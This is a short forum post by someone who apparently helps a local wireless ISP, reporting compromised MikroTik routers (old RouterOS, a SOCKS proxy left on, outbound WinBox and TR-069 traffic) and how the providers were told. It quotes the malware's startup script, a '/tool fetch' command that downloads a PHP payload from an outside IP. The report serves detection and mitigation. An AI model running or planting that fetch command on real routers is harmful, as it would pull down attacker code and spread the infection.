Do not know if it is related to this particular botnet, but I found a local WISP I help from time to time had some hacked Mikrotiks.
Symptoms were as follows:
RouterOS version 6.34.x or lower
Multiple outbound connections to ports 8291 (WinBox) and 7547 (tr069)
socks proxy enabled
system scheduler set to run script on startup
contents of script were:
/tool fetch address=18.104.22.168 port=2008 src path=/mikrotik.php
Found said php file in files on infected Mikrotiks
Stopped digging at that point and informed WISP, and helped to mitigate the issue.
Also found similar traffic on a second local WISP, informed them as well.
I was very concerned because these were both my main and backup internet connections.
Upon further investigation I found similar traffic coming in from upstream of my #1 provider, informed the carrier who delivers backbone to both providers a week ago.
Still getting hit pretty hard with incoming traffic that matches the pattern, firewall rules I setup on Wisp #1 main router holding for now...
Southwest Colorado USA